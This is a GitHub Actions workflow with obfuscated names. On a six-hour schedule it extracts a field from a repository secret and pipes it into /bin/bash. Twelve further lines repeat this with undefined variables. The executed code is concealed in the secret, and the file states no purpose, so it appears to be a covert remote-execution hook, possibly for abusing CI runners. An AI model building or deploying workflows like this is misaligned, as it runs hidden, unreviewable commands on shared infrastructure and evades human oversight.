name: establishbelowground
on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: establishbelowground
        env:
          tne6: ${{ secrets.tne6 }}
        run: |
          echo $tne6 | jq -r .pvncu24 | /bin/bash
          echo $roexw74288 | jq -r .jyuaq9 | /bin/bash
          echo $b56 | jq -r .uleut637 | /bin/bash
          echo $if5807 | jq -r .lrpxz4 | /bin/bash
          echo $h51663 | jq -r .gbp25 | /bin/bash
          echo $ze300 | jq -r .bsnsk05 | /bin/bash
          echo $kr1750 | jq -r .ugng81552 | /bin/bash
          echo $vgpa382 | jq -r .izi1441 | /bin/bash
          echo $do37 | jq -r .os47 | /bin/bash
          echo $mhp99699 | jq -r .sh071 | /bin/bash
          echo $gbuie260 | jq -r .zey1 | /bin/bash
          echo $x536 | jq -r .kut59121 | /bin/bash
          echo $q19588 | jq -r .i960 | /bin/bash

